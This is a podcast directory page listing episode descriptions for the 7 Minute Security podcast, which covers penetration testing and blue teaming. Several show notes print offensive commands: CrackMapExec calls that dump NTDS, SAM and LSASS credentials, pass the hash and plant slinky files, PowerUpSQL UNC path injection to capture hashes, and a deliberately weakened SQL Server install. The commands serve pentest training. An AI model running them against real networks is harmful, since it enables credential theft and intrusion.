7 Minute Security
7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.

Jaksot(681)

7MS #569: Interview with Jim Simpson of Blumira

7MS #569: Interview with Jim Simpson of Blumira

Today we're excited to share a featured interview with our new friend Jim Simpson, CEO of Blumira. Jim was in security before it was hip/cool/lucrative, working with a number of startups as well as some big names like Duo. Blumira and 7 Minute Security have a shared love for helping SMBs be more secure, so it was great to chat with Jim about the IT/security challenges faced by SMBs, and what we can do make security more simple and accessible for them.

28 Huhti 202355min

7MS #568: Lets Play With the 2023 Local Administrator Password Solution!

7MS #568: Lets Play With the 2023 Local Administrator Password Solution!

Hey friends, today we're playing with the new (April 2023) version of Local Administrator Password Solution (LAPS). Now it's baked right into PowerShell and the AD Users and Tools console. It's awesome, it's a necessary blue team control for any size company, and you should basically stop reading this and install LAPS now.

21 Huhti 202319min

7MS #567: How to Build an Intentionally Vulnerable SQL Server

7MS #567: How to Build an Intentionally Vulnerable SQL Server

Hey friends, today we're talking about building an intentionally vulnerable SQL server, and here are the key URLs/commands talked about in the episode: Download SQL Server here Install SQL via config .ini file Or, install SQL via pure command line Deploy SQL with a service account while also starting TCP/IP and named pipes automagically: setup.exe /Q /IACCEPTSQLSERVERLICENSETERMS /ACTION="install" /FEATURES=SQL /INSTANCENAME=MSSQLSERVER /TCPENABLED=1 /NPENABLED=1 /SQLSVCACCOUNT="YOURDOMAIN\YOUR-SERVICE-ACCOUNT" /SQLSVCPASSWORD="YOUR PASSWORD" /SQLSYSADMINACCOUNTS="YOURDOMAIN\administrator" "YOURDOMAIN\domain users" Run PowerUpSQL to find vulnerable SQL servers: $Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 | Where-Object {$_.Status -like "Accessible"} Audit the discovered SQL servers: Get-SQLInstanceDomain -verbose | invoke-sqlaudit -verbose Fire off stored procedures to catch hashes! Invoke-SQLUncPathInjection -verbose -captureIP IP.OF-YOUR.KALI.BOX

14 Huhti 202339min

7MS #566: Tales of Pentest Pwnage - Part 47

7MS #566: Tales of Pentest Pwnage - Part 47

Ok, I know we say this every time, but it is true this time yet again: this is our favorite tale of pentest pwnage. It involves a path to DA we've never tried before, and introduced us to a new trick that one of our favorite old tools can do!

31 Maalis 202354min

7MS #565: How to Simulate Ransomware with a Monkey

7MS #565: How to Simulate Ransomware with a Monkey

Hey friends, today we talk through how to simulate ransomware (in a test environment!) using Infection Monkey. It's a cool way to show your team and execs just how quick and deadly an infection can be to your business. You can feed the monkey a list of usernames and passwords/hashes to use for lateral movement, test network segmentation, set a UNC path of files to actually encrypt (careful - run in a test lab - NOT in prod!) and more!

24 Maalis 202327min

7MS #564: First Impressions of OVHcloud Hosted vCenter

7MS #564: First Impressions of OVHcloud Hosted vCenter

Today we offer you some first impressions of OVHcloud and how we're seriously considering moving our Light Pentest LITE training class to it! TLDR: It runs on vCenter, my first and only virtualization love! Unlimited VM "powered on" time and unlimited bandwidth Intergration with PowerShell so you can run a single script to "heal" your environment to a gold image Easy integration with pfSense to be able to manage the firewall and internal/external IPs Price comparable to what we're paying now in Azure land

17 Maalis 202343min

7MS #563: Cracking and Mapping and Execing with CrackMapExec - Part 2

7MS #563: Cracking and Mapping and Execing with CrackMapExec - Part 2

Hey friends, today we're covering part 2 of our series all about cracking and mapping and execing with CrackMapExec. Specifically we cover: # Enumerate where your user has local admin rights: cme smb x.x.x.x/24 -u user -p password # Set wdigest flag: cme smb x.x.x.x -u user -p password -M wdigest -o ACTION=enable # Dump AD creds: cme smb IP.OF.DOMAIN.CONTROLLER -u user -p password --ntds --enabled # Clean up AD dump output: cat /path/to/file.ntds | grep -iv disabled | cut -d ':' -f1,4 | grep -v '\$' | sort # Check ms-ds-machineaccountquota: cme ldap x.x.x.x -u user -p password -M maq # Check for Active Directory Certificate Services: cme ldap x.x.x.x -u user -p password -M adcs # Pull all AD user descriptions: cme ldap x.x.x.x -u user -p password -M get-desc-users # Pull all AD user descriptions down to a file and search for users with "pass" in description: cme ldap x.x.x.x -u user -p password -M user-desc # CrackMapExec database (CME) ## Clear database sudo rm -r ~/.cme ## Handy commands inside the cmedb prompt: hosts shares creds export shares detailed shares.csv export creds detailed creds.txt

10 Maalis 202335min

7MS #562: Cracking and Mapping and Execing with CrackMapExec

7MS #562: Cracking and Mapping and Execing with CrackMapExec

Hey friends, today we covered many things cracking and mapping and execing with CrackMapExec. Specifically: # General enumeration to see if your account works, and where: cme smb x.x.x.x -u username -p pass # Check if print services are enabled: cme smb x.x.x.x -u username -p pass -M spooler # Check for the nopac vuln: cme smb x.x.x.x -u username -p pass -M nopac # Find GP passwords: cme smb DOMAIN.CONTROLLER.IP.ADDRESS -u username -p pass -M gpp_password # Get list of targets with smb signing: cme smb x.x.x.x -u username -p pass --gen-relay-list smbsigning.txt # Set wdigest flag: cme smb x.x.x.x -u username -p pass -M widgest -o ACTION=enable # Dump creds/hashes: cme smb x.x.x.x -u username -p pass -M lsassy # Do pass the hash attacks cme smb x.x.x.x -u username -H HASH # Dump SAM database: cme smb x.x.x.x -u username -p pass --sam # Enumerate SMB shares cme smb x.x.x.x -u username -p pass --shares # Conduct slinky attack: cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7 # Cleanup from slinky attack: cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7

3 Maalis 202340min

Suosittua kategoriassa Politiikka ja uutiset

rss-podme-livebox
ootsa-kuullut-tasta-2
aikalisa
politiikan-puskaradio
otetaan-yhdet
et-sa-noin-voi-sanoo-esittaa
rss-vaalirankkurit-podcast
rikosmyytit
aihe
rss-mina-ukkola
rss-raha-talous-ja-politiikka
rss-hyvaa-huomenta-bryssel
rss-kyselytunti
rss-tasta-on-kyse-ivan-puopolo-verkkouutiset
politbyroo
the-ulkopolitist
rss-kalevi-sorsa-saation-podcast
rss-suoraan-asiaan
rss-sinivalkoinen-islam
rss-kaikki-paskaksi-ystavat